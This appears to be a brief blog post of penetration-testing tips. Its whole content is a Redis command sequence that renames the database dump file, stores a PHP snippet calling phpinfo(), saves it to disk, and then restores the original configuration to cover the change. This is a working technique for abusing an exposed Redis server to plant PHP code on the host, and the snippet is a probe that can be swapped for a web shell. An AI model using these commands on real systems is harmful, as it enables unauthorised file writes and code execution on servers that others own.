Just some tips I found useful

Redis

Setup new filename and add data init:

config set dbfilename plop.txt
set plop "<?php phpinfo();//?>"
save

Don’t forget to restore previous configuration:

config set dbfilename dump.rdb
save
Last updated on Wednesday, July 1, 2020
Published on Wednesday, July 1, 2020